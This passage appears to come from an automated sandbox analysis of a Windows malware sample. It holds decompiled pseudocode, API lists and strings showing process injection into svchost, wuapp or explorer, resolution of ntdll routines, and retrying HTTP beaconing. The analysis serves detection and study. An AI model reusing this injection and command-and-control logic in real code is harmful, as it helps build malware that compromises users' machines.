0x00405f70
0x00405f72
0x004061c3
0x004061c8
0x004061d7
0x004061dc
0x00000000
0x00405f78
0x00405f91
0x00405f9f
0x00405fa4
0x00405fa9
0x00000000
0x00405faf
0x00405faf
0x00405fb2
0x00405fb5
0x00405fb8
0x00405fbb
0x00405fbd
0x00405ff9
0x0040600c
0x00406013
0x00406018
0x0040601b
0x00000000
0x0040603b
0x0040603b
0x00406055
0x00000000
0x0040605b
0x0040605b
0x00406061
0x0040606c
0x004060e2
0x004060fb
0x0040610a
0x00000000
0x00406110
0x00406115
0x0040611a
0x0040612a
0x0040612c
0x00406139
0x00000000
0x0040614b
0x00406150
0x00406164
0x0040616a
0x0040616f
0x00406179
0x00406192
0x004061a1
0x004061a1
0x004061b0
0x004061b5
0x004061c2
0x004061c2
0x00406139
0x0040606e
0x00406071
0x00406073
0x00406088
0x00406097
0x00000000
0x00000000
0x004060a0
0x004060a5
0x004060b8
0x004060c7
0x00000000
0x004060cd
0x004060d0
0x004060d7
0x004060d8
0x004060dd
0x00000000
0x004060df
0x004060df
0x00000000
0x004060df
0x004060dd
0x00000000
0x004060c7
0x00000000
0x00406073
0x0040606c
0x00406055
0x00405fbf
0x00405fbf
0x00405fc2
0x00405fce
0x00405fd3
0x00405fd6
0x00405fd9
0x00405fdc
0x00405fde
0x00000000
0x00405fe7
0x00405fec
0x00405ff1
0x00405ff3
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ff3
0x00000000
0x00000000
0x00000000
0x00405fc2
0x00405fbd
0x00405fa9
0x00405f72
0x00405f52
0x00405ef7
0x00000000

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,00000044,?), ref: 00405F4A
Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 00406150
VirtualAlloc.KERNELBASE(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 00406164
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 004061A1
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 004061B5

Part of subcall function 004074D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,0040C038,?,?,?,?,00000000,?,00003000,00000040), ref: 004074FF

Part of subcall function 004073C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 00407429

TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061C8
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061D7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,I@,?), ref: 004061DC

Strings

I@, xrefs: 00405E7D
ntdll.dll, xrefs: 00405EC6
0125789244697858, xrefs: 00405EB9

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseProcess$Handle$CurrentVirtual$AllocChangeCreateFindFreeNotificationSleepTerminate
String ID: 0125789244697858$ntdll.dll$I@
API String ID: 3897173628-1460664302
Opcode ID: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
Instruction ID: 1d2188587597bc53f96400c66c54050a6bc471ffeb9cfe25592a30c854cca956
Opcode Fuzzy Hash: 0a380abd92552f4928be6177836d68444a34bb84d15ef365db8cee4c191364a7
Instruction Fuzzy Hash: E9B18071D00209BBEF109B95CD41FAEBBB9FF04304F14406AFA05B62D1E779A960DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00407FA0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00407FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				void* _t17;
				struct HINSTANCE__* _t22;

				_t22 = LoadLibraryA("Shell32.dll");
				if(_t22 == 0) {
					L8:
					return 0;
				} else {
					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
					if(_t11 == 0) {
						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
						if(_t12 == 0) {
							goto L7;
						} else {
							_push(_a4);
							_push(0);
							_push(0);
							_push(_a12);
							_push(0);
							if( *_t12() == 0) {
								goto L4;
							} else {
								goto L7;
							}
						}
					} else {
						_v8 = 0;
						_t17 =  *_t11(_a8, 0, 0,  &_v8); // executed
						if(_t17 != 0) {
							L7:
							FreeLibrary(_t22);
							goto L8;
						} else {
							E00401A00(_a4, _v8);
							__imp__CoTaskMemFree(_v8);
							L4:
							FreeLibrary(_t22);
							return 1;
						}
					}
				}
			}

0x00407fb0
0x00407fb4
0x0040802f
0x00408035
0x00407fb6
0x00407fbc
0x00407fc4
0x0040800c
0x00408014
0x00000000
0x00408016
0x00408016
0x00408019
0x0040801b
0x0040801d
0x00408020
0x00408026
0x00000000
0x00000000
0x00000000
0x00000000
0x00408026
0x00407fc6
0x00407fc9
0x00407fd8
0x00407fdc
0x00408028
0x00408029
0x00000000
0x00407fde
0x00407fe4
0x00407fef
0x00407ff5
0x00407ff6
0x00408005
0x00408005
0x00407fdc
0x00407fc4

APIs

LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FAA
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00407FBC
CoTaskMemFree.OLE32(00000000,0040AAE0), ref: 00407FEF
FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00407FF6
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040800C
FreeLibrary.KERNEL32(00000000,?,?,0040461E,C:\ProgramData\LKBNMTFJgl,0040AAE0,00000023), ref: 00408029

Strings

Shell32.dll, xrefs: 00407FA5
SHGetFolderPathW, xrefs: 00408006
SHGetKnownFolderPath, xrefs: 00407FB6

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary$AddressProc$LoadTask
String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
API String ID: 2437428030-337183102
Opcode ID: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
Instruction ID: 5a5f59212e9234ed04b8ab6130e8ec1b5f2c4e940e4abc4082f6536912f10ee2
Opcode Fuzzy Hash: ab5138febe831b5d3af195338a01a6775a2fe4f8e8e9f4456204fd6712aeb4cb
Instruction Fuzzy Hash: 6901F531640205BBDB215F60DE0AB9E3BA8EF08741F104035FD04B41E1EFB9DE249A9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403150, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403150(intOrPtr _a4) {
				short _v524;
				int _t6;
				void* _t11;
				void* _t16;
				char* _t17;
				char* _t18;

				if( *0x5d1314 == 0) {
					if( *0x5d1318 == 0) {
						_t17 = L"\\System32\\wuapp.exe";
						_t18 = L"\\System32\\svchost.exe";
					} else {
						goto L4;
					}
				} else {
					if( *0x5d1318 != 0) {
						L4:
						_t17 = L"\\SysWOW64\\wuapp.exe";
						_t18 = L"\\SysWOW64\\svchost.exe";
					} else {
						_t17 = L"\\notepad.exe";
						_t18 = L"\\explorer.exe";
					}
				}
				_t6 = GetWindowsDirectoryW( &_v524, 0x104);
				if(_t6 == 0 || _t6 > 0x104) {
					return 0;
				} else {
					_t20 = _a4;
					E00401A00(_a4,  &_v524);
					E00401970(_a4, _t17);
					_t11 = E00407ED0(_t20); // executed
					if(_t11 != 0) {
						L11:
						return 1;
					} else {
						E00401A00(_t20,  &_v524);
						E00401970(_t20, _t18);
						_t16 = E00407ED0(_t20);
						if(_t16 != 0) {
							goto L11;
						} else {
							return _t16;
						}
					}
				}
			}

0x00403162
0x00403180
0x0040318e
0x00403193
0x00000000
0x00000000
0x00000000
0x00403164
0x0040316b
0x00403182
0x00403182
0x00403187
0x0040316d
0x0040316d
0x00403172
0x00403172
0x0040316b
0x004031a4
0x004031ac
0x00403215
0x004031b5
0x004031b6
0x004031c1
0x004031c8
0x004031ce
0x004031d8
0x00403202
0x0040320d
0x004031da
0x004031e2
0x004031e9
0x004031ef
0x004031f9
0x00000000
0x004031fb
0x00403201
0x00403201
0x004031f9
0x004031d8

APIs

GetWindowsDirectoryW.KERNEL32(?,00000104,73B74D40,00000000), ref: 004031A4

Strings

\System32\wuapp.exe, xrefs: 0040318E
\System32\svchost.exe, xrefs: 00403193
\explorer.exe, xrefs: 00403172
\SysWOW64\wuapp.exe, xrefs: 00403182, 004031C6
\SysWOW64\svchost.exe, xrefs: 00403187, 004031E7
\notepad.exe, xrefs: 0040316D

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DirectoryWindows
String ID: \SysWOW64\svchost.exe$\SysWOW64\wuapp.exe$\System32\svchost.exe$\System32\wuapp.exe$\explorer.exe$\notepad.exe
API String ID: 3619848164-3654143111
Opcode ID: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
Instruction ID: 5271e3ad36bb831133aa074bfbbea18cf9a940d0c74e058bf0f41e493ec8db13
Opcode Fuzzy Hash: 58585422758d50ecb61684f8bac33cdbd10527928f2f89fb89a2ae6478207968
Instruction Fuzzy Hash: 8B112B71A0220467D7206A15AC45BAB775CCB0535AF1405BBFD08F62E3D73E9F8582DE

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE0, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 152
sleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404DE0(short __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				char _v1784;
				intOrPtr _v1788;
				char _v1792;
				intOrPtr _v1796;
				char _v2052;
				intOrPtr _v2056;
				char _v2568;
				char _v3080;
				intOrPtr _v3084;
				char _v3148;
				char _v3276;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t46;
				char _t52;
				char _t62;
				void* _t76;
				short _t79;
				void* _t84;
				intOrPtr _t85;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t93;

				_t93 = __eflags;
				_t80 = __edx;
				_t79 = __ecx;
				E00401670( &_v3276, 0, 0xcc8);
				_t41 =  *0x5d1bb4; // 0x1e
				_t81 = _a4;
				_v2056 = _t41;
				_t42 =  *0x5d1bbc; // 0xa
				_v1796 = _t42;
				_t43 =  *0x5d1c24; // 0x0
				_v1788 = _t43;
				_t44 = E00404B00(_t79, __edx, _t93, _a4); // executed
				_t84 = _t44;
				_t87 = _t86 + 0x10;
				_t94 = _t84;
				if(_t84 != 0) {
					L5:
					_t46 = E004028F0(_t84, E00405000,  &_v3276);
					_t88 = _t87 + 0xc;
					_push(_t84);
					if(_t46 >= 0) {
						E00401510();
						_t85 = _a12;
						_t89 = _t88 + 4;
						__eflags = _v2052;
						if(_v2052 != 0) {
							E004017E0(_t85 + 0x4c8,  &_v2052);
							_t89 = _t89 + 8;
						}
						__eflags = _v3276;
						if(_v3276 != 0) {
							E004017E0(_t85,  &_v3276);
							_t89 = _t89 + 8;
						}
						__eflags = _v3148;
						if(_v3148 != 0) {
							E004017E0(_t85 + 0x80,  &_v3148);
							_t89 = _t89 + 8;
						}
						__eflags = _v3080;
						if(_v3080 != 0) {
							_t82 = _t85 + 0xc4;
							E004017E0(_t85 + 0xc4,  &_v3080);
							_t89 = _t89 + 8;
							__eflags = _v1784;
							if(_v1784 != 0) {
								__eflags =  *0x5d1c28;
								if( *0x5d1c28 != 0) {
									_t62 = E00401740("d572da9202196121d952231f26d65d07",  &_v1784);
									_t89 = _t89 + 8;
									__eflags = _t62;
									if(_t62 != 0) {
										_t23 =  &_a20; // 0x404a7a
										E004076A0(_t79, _t80, _t82, _a16,  *_t23,  &_v1784);
										_t89 = _t89 + 0x10;
									}
								}
							}
						}
						__eflags = _v2568;
						if(_v2568 != 0) {
							E004017E0(_t85 + 0x2c4,  &_v2568);
							_t89 = _t89 + 8;
						}
						 *((intOrPtr*)(_t85 + 0xc0)) = _v3084;
						 *((intOrPtr*)(_t85 + 0x4c4)) = _v2056;
						 *((intOrPtr*)(_t85 + 0x5c8)) = _v1796;
						 *((intOrPtr*)(_t85 + 0x5d0)) = _v1788;
						_t52 = _v1792;
						 *((intOrPtr*)(_t85 + 0x5cc)) = _t52;
						__eflags = _t52;
						if(_t52 != 0) {
							E004017E0(_t85 + 0x4c8, "d06ed635-68f6-4e9a-955c-4899f5f57b9a");
						}
						return 1;
					} else {
						E00401510();
						goto L7;
					}
				} else {
					Sleep(0x2710);
					_t84 = E00404B00(_t79, _t80, _t94, _t81);
					_t87 = _t87 + 4;
					if(_t84 != 0) {
						goto L5;
					} else {
						_t76 = E004017B0("FALSE", "FALSE");
						_t92 = _t87 + 8;
						_t96 = _t76;
						if(_t76 == 0) {
							L7:
							return 0;
						} else {
							_t83 = _a8;
							_t84 = E00404B00(_t79, _t80, _t96, _a8);
							_t87 = _t92 + 4;
							_t97 = _t84;
							if(_t84 != 0) {
								goto L5;
							} else {
								Sleep(0x2710);
								_t84 = E00404B00(_t79, _t80, _t97, _t83);
								_t87 = _t87 + 4;
								if(_t84 == 0) {
									goto L7;
								} else {
									goto L5;
								}
							}
						}
					}
				}
			}

0x00404de0
0x00404de0
0x00404de0
0x00404df9
0x00404dfe
0x00404e03
0x00404e06
0x00404e0c
0x00404e11
0x00404e17
0x00404e1d
0x00404e23
0x00404e28
0x00404e2a
0x00404e2d
0x00404e2f
0x00404e8d
0x00404e9a
0x00404e9f
0x00404ea2
0x00404ea5
0x00404eb7
0x00404ebc
0x00404ebf
0x00404ec2
0x00404ec9
0x00404ed9
0x00404ede
0x00404ede
0x00404ee1
0x00404ee8
0x00404ef2
0x00404ef7
0x00404ef7
0x00404efa
0x00404f01
0x00404f11
0x00404f16
0x00404f16
0x00404f19
0x00404f20
0x00404f29
0x00404f30
0x00404f35
0x00404f38
0x00404f3f
0x00404f41
0x00404f48
0x00404f56
0x00404f5b
0x00404f5e
0x00404f60
0x00404f69
0x00404f70
0x00404f75
0x00404f75
0x00404f60
0x00404f48
0x00404f3f
0x00404f78
0x00404f7f
0x00404f8f
0x00404f94
0x00404f94
0x00404f9d
0x00404fa9
0x00404fb5
0x00404fc1
0x00404fc7
0x00404fcd
0x00404fd3
0x00404fd5
0x00404fe3
0x00404fe8
0x00404ff5
0x00404ea7
0x00404ea7
0x00000000
0x00404eac
0x00404e31
0x00404e36
0x00404e42
0x00404e44
0x00404e49
0x00000000
0x00404e4b
0x00404e55
0x00404e5a
0x00404e5d
0x00404e5f
0x00404eb0
0x00404eb6
0x00404e61
0x00404e61
0x00404e6a
0x00404e6c
0x00404e6f
0x00404e71
0x00000000
0x00404e73
0x00404e78
0x00404e84
0x00404e86
0x00404e8b
0x00000000
0x00000000
0x00000000
0x00000000
0x00404e8b
0x00404e71
0x00404e5f
0x00404e49

APIs

Part of subcall function 00404B00: InternetCrackUrlA.WININET(73BCEA30,00000000,?), ref: 00404B57

Sleep.KERNEL32(00002710,?,?,73BCEA30,00000000), ref: 00404E36

Part of subcall function 00404B00: InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00404B9D

Part of subcall function 00404B00: InternetConnectA.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 00404BCB
Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404BE5

Sleep.KERNEL32(00002710,?,?,?,?,?,?,73BCEA30,00000000), ref: 00404E78

Part of subcall function 00404B00: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,0040A200,846CF300,00000000), ref: 00404C52
Part of subcall function 00404B00: InternetQueryOptionA.WININET(00000000,0000001F,73BCEA30,00000000), ref: 00404C8C
Part of subcall function 00404B00: InternetSetOptionA.WININET(00000000,0000001F,00000180,00000004), ref: 00404CAA
Part of subcall function 00404B00: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404CC1
Part of subcall function 00404B00: InternetReadFile.WININET(00000CC8,00000000,00000400,00000000), ref: 00404CF3
Part of subcall function 00404B00: InternetCloseHandle.WININET(00000CC8), ref: 00404D9A
Part of subcall function 00404B00: InternetCloseHandle.WININET(00000000), ref: 00404D9F

Strings

zJ@, xrefs: 00404F69
d06ed635-68f6-4e9a-955c-4899f5f57b9a, xrefs: 00404FDD
d572da9202196121d952231f26d65d07, xrefs: 00404F41, 00404F51
FALSE, xrefs: 00404E4B
FALSE, xrefs: 00404E50

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenOptionRequestSleep$ConnectCrackFileQueryReadSend
String ID: FALSE$FALSE$d06ed635-68f6-4e9a-955c-4899f5f57b9a$d572da9202196121d952231f26d65d07$zJ@
API String ID: 581717041-2028580964
Opcode ID: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
Instruction ID: 78b4ba5b10ac8112f2c62d6eddd8c7677888aa5bfa1098f5850d3e15ab47de6f
Opcode Fuzzy Hash: f6e244a9823f2d47c510c447beec4e774f5ae107e04512a416141b7e5e042319
Instruction Fuzzy Hash: 9351C5B1D012155BEB21EB64DC41FDB77E86B44344F0405BBE90CB32C1EB38AA94CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00408450, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100
sleepthreadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00408450(char* __ecx, void* __eflags) {
				char _v8;
				char _v1032;
				char _v1036;
				long _v1040;
				char _v5136;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t24;
				intOrPtr _t27;
				void* _t29;
				intOrPtr _t30;
				void* _t34;
				void* _t35;
				intOrPtr _t39;
				signed int _t41;
				void* _t43;
				void* _t44;
				void* _t46;
				void* _t47;

				_t37 = __ecx;
				E00401BB0( &_v5136, 0, 0x1000);
				E00401BB0( &_v1036, 0, 0x404);
				E00401670( &_v1036, 0, 0x404);
				_v1036 = GetCurrentProcessId();
				E00401A00( &_v1032, "C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe");
				_t46 = _t44 + 0x2c;
				_push(_t35);
				_push(_t41);
				_push(_t39);
				L1:
				while(1) {
					if( *0x5d1314 == 0) {
						_t24 = E00407EF0("explorer.exe");
						_t47 = _t46 + 4;
						if(_t24 != 0) {
							_t37 =  &_v1036;
							E004029E0( &_v1036, 0x400000, _t24,  &_v1036, 0x404,  &_v8, E00408390);
							_t46 = _t47 + 0x18;
							goto L12;
						}
					} else {
						_v1040 = 0;
						_t29 = E004080E0(_t35, _t39, _t41, 1,  &_v5136, 0x1000); // executed
						_t35 = _t29;
						_t46 = _t46 + 0xc;
						if(_t35 != 0) {
							_t41 = 0;
							if(_t35 != 0) {
								while(1) {
									_t30 =  *0x5d2118; // 0x0
									if(_t30 != 0) {
										goto L12;
									}
									_t39 =  *((intOrPtr*)(_t43 + _t41 * 4 - 0x140c));
									if(_t39 == 0 || _t39 == GetCurrentProcessId()) {
										L8:
										_t41 = _t41 + 1;
										if(_t41 < _t35) {
											continue;
										} else {
										}
									} else {
										_t34 = E004029E0(_t37, 0x400000, _t39,  &_v1036, 0x404,  &_v8, E00408390); // executed
										_t46 = _t46 + 0x18;
										if(_t34 == 0) {
											goto L8;
										}
									}
									goto L12;
								}
							}
							L12:
							_t27 =  *0x5d2118; // 0x0
							if(_t27 != 0) {
								ExitThread(0);
							}
							Sleep(0x1f4);
							continue;
						}
					}
					return 0;
				}
			}

0x00408450
0x00408467
0x0040847a
0x0040848d
0x0040849b
0x004084ad
0x004084b2
0x004084b5
0x004084b6
0x004084b7
0x00000000
0x004084c0
0x004084c7
0x00408552
0x00408557
0x0040855c
0x0040856c
0x00408579
0x0040857e
0x00000000
0x0040857e
0x004084cd
0x004084d8
0x004084e5
0x004084ea
0x004084ec
0x004084f1
0x004084f7
0x004084fb
0x00408501
0x00408501
0x00408508
0x00000000
0x00000000
0x0040850a
0x00408513
0x00408546
0x00408546
0x00408549
0x00000000
0x00000000
0x0040854b
0x0040851f
0x0040853a
0x0040853f
0x00408544
0x00000000
0x00000000
0x00408544
0x00000000
0x00408513
0x00408501
0x00408581
0x00408581
0x00408588
0x0040859c
0x0040859c
0x0040858f
0x00000000
0x0040858f
0x004084f1
0x004085aa
0x004085aa

APIs

GetCurrentProcessId.KERNEL32 ref: 00408495
GetCurrentProcessId.KERNEL32 ref: 00408515
Sleep.KERNEL32(000001F4), ref: 0040858F
ExitThread.KERNEL32 ref: 0040859C

Strings

C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe, xrefs: 004084A7
explorer.exe, xrefs: 0040854D

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CurrentProcess$ExitSleepThread
String ID: C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe$explorer.exe
API String ID: 970816010-2632522001
Opcode ID: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
Instruction ID: 85ffc2236a6c84dd18c35f3841ea3bb67a2469adcd3a8cb5e8b5d398127c98f4
Opcode Fuzzy Hash: 23dac3867fb613243539c5080df6174ce124e5fc0d0057c529f6c3144e09810b
Instruction Fuzzy Hash: 02310DF5A40204B6EB10AB919E46FE7336C5714745F0400BFBF44B21D2EEB85E4986BD

Uniqueness

Uniqueness Score: -1.00%

Function 00407EF0, Relevance: 9.1, APIs: 6, Instructions: 64
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407EF0(intOrPtr _a4) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				void* _t9;
				void* _t13;
				int _t17;
				void* _t21;
				void* _t29;
				void* _t30;
				void* _t31;

				_v300 = 0x128;
				_t9 = CreateToolhelp32Snapshot(2, 0); // executed
				_t29 = _t9;
				if(_t29 != 0xffffffff) {
					Process32First(_t29,  &_v300); // executed
					_t26 = _a4;
					_t13 = E00401740(_a4,  &_v264);
					_t31 = _t30 + 8;
					if(_t13 == 0) {
						L7:
						CloseHandle(_t29);
						return _v292;
					} else {
						_t17 = Process32Next(_t29,  &_v300); // executed
						if(_t17 == 0) {
							L6:
							FindCloseChangeNotification(_t29); // executed
							return 0;
						} else {
							while(1) {
								_t21 = E00401740(_t26,  &_v264);
								_t31 = _t31 + 8;
								if(_t21 == 0) {
									goto L7;
								}
								if(Process32Next(_t29,  &_v300) != 0) {
									continue;
								} else {
									goto L6;
								}
								goto L8;
							}
							goto L7;
						}
					}
				} else {
					return 0;
				}
				L8:
			}

0x00407efe
0x00407f08
0x00407f0d
0x00407f12
0x00407f24
0x00407f29
0x00407f34
0x00407f39
0x00407f3e
0x00407f85
0x00407f86
0x00407f97
0x00407f40
0x00407f48
0x00407f4f
0x00407f76
0x00407f77
0x00407f84
0x00407f51
0x00407f51
0x00407f59
0x00407f5e
0x00407f63
0x00000000
0x00000000
0x00407f74
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407f74
0x00000000
0x00407f51
0x00407f4f
0x00407f14
0x00407f1a
0x00407f1a
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00407F08
Process32First.KERNEL32 ref: 00407F24
Process32Next.KERNEL32 ref: 00407F48
Process32Next.KERNEL32 ref: 00407F6D
FindCloseChangeNotification.KERNELBASE(00000000,00000000,00000128,00000000,?), ref: 00407F77

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Process32$Next$ChangeCloseCreateFindFirstNotificationSnapshotToolhelp32
String ID:
API String ID: 4072508860-0
Opcode ID: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
Instruction ID: 2d56b8353110eab1b9b04cc9459ef1c3f068b5f37dea811fb5169f2e54792dba
Opcode Fuzzy Hash: e4ca192297ae2abfc18c74d4c2ed59ead4e19fef381fd0585f9fea2239c3ba31
Instruction Fuzzy Hash: CA11293190102967DB20A625AD41EEB73ACDF48325F0002BBFD48E21C1EB38DE5186AA

Uniqueness

Uniqueness Score: -1.00%

Function 004021A0, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 99
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E004021A0(void* __ecx, signed int __edx, char _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				signed int _v16;
				void* _v20;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				signed int _t22;
				void* _t24;
				short _t27;
				void* _t31;
				signed int _t37;
				signed int _t38;
				void _t40;
				signed int _t46;
				void* _t52;
				intOrPtr _t57;
				void* _t61;
				void* _t62;

				_t46 = __edx;
				_t22 =  *0x5d1128; // 0xbd4fff60
				_t62 = _t61 - 0x28;
				_t64 = _t22 |  *0x5d112c;
				if((_t22 |  *0x5d112c) != 0) {
					L3:
					_t24 = VirtualAlloc(0, 0x120, 0x3000, 4); // executed
					_t52 = _t24;
					__eflags = _t52;
					if(_t52 != 0) {
						_t2 = _t52 + 0x18; // 0x18
						_t57 = _t2;
						E004017E0(_t57, _a12);
						asm("cdq");
						 *((intOrPtr*)(_t52 + 0x10)) = _t57;
						 *(_t52 + 0x14) = _t46;
						_t27 = E00401850(_t57);
						asm("xorps xmm0, xmm0");
						 *((short*)(_t52 + 8)) = _t27;
						 *((short*)(_t52 + 0xa)) = _t27;
						_t8 = _t52 + 8; // 0x8
						 *_t52 = 0;
						 *(_t52 + 4) = 0;
						asm("cdq");
						_v36 = _t8;
						_v32 = _t46;
						asm("cdq");
						_v20 = _t52;
						_v44 = _a4;
						_v40 = _a8;
						asm("movlpd [ebp-0x18], xmm0");
						_v16 = _t46;
						_t31 = E00401D10( *0x5d1128,  *0x5d112c,  &_v44, 4);
						_t40 =  *_t52;
						_v8 = 0;
						_v8 =  *(_t52 + 4);
						VirtualFree(_t52, 0, 0x8000); // executed
						__eflags = _t31;
						if(_t31 < 0) {
							__eflags = 0;
							return 0;
						} else {
							return _t40;
						}
					} else {
						__eflags = 0;
						return _t24;
					}
				} else {
					_t37 = E004022B0(_t46, E00401E50(__ecx, __edx, _t64, "ntdll.dll"), _t46, "LdrGetProcedureAddress");
					_t62 = _t62 + 0x10;
					 *0x5d1128 = _t37;
					_t38 = _t37 | _t46;
					 *0x5d112c = _t46;
					if(_t38 != 0) {
						goto L3;
					} else {
						return _t38;
					}
				}
			}

0x004021a0
0x004021a3
0x004021a8
0x004021ab
0x004021b1
0x004021e1
0x004021f0
0x004021f6
0x004021f8
0x004021fa
0x00402208
0x00402208
0x0040220c
0x00402213
0x00402215
0x00402218
0x0040221b
0x00402223
0x00402226
0x0040222a
0x0040222e
0x00402231
0x00402237
0x0040223e
0x0040223f
0x00402244
0x00402247
0x00402248
0x00402257
0x00402263
0x00402266
0x0040226b
0x0040226e
0x00402273
0x0040227a
0x00402284
0x0040228f
0x00402295
0x00402297
0x004022a9
0x004022af
0x00402299
0x004022a4
0x004022a4
0x004021fc
0x004021fc
0x00402202
0x00402202
0x004021b3
0x004021c4
0x004021c9
0x004021cc
0x004021d1
0x004021d3
0x004021d9
0x00000000
0x004021db
0x004021e0
0x004021e0
0x004021d9

APIs

VirtualAlloc.KERNELBASE(00000000,00000120,00003000,00000004,?,?,?,?,?,00406208,?,?,NtGetContextThread,?,?,?), ref: 004021F0
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00406208,?), ref: 0040228F

Strings

ntdll.dll, xrefs: 004021B3
LdrGetProcedureAddress, xrefs: 004021BD

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID: LdrGetProcedureAddress$ntdll.dll
API String ID: 2087232378-1174695804
Opcode ID: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
Instruction ID: 0eb8dc9d9b9cb1f38aa61a5e869cd7518be7929c4289078d347e1877a8125501
Opcode Fuzzy Hash: c33a02798e6a53002745d0f77be891a07d66ca9fe96947442056161f0f134ff1
Instruction Fuzzy Hash: EE31A675E01605ABD710DFA5DC4179AF7B5FF88314F10816BFA08A7290D774A910DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 00403050, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403050(void* __ebx, void* __ecx, intOrPtr _a4, char _a8) {
				char _v8;
				void* _t8;
				void* _t11;
				void* _t22;
				void* _t23;

				_t15 = __ecx;
				_push(__ecx);
				_t20 = _a4;
				_t3 =  &_a8; // 0x4049e6
				_t17 =  *_t3;
				_v8 = 0;
				_t8 = E00402930(__ebx, __ecx, _a4,  *_t3,  &_v8); // executed
				_t23 = _t22 + 0xc;
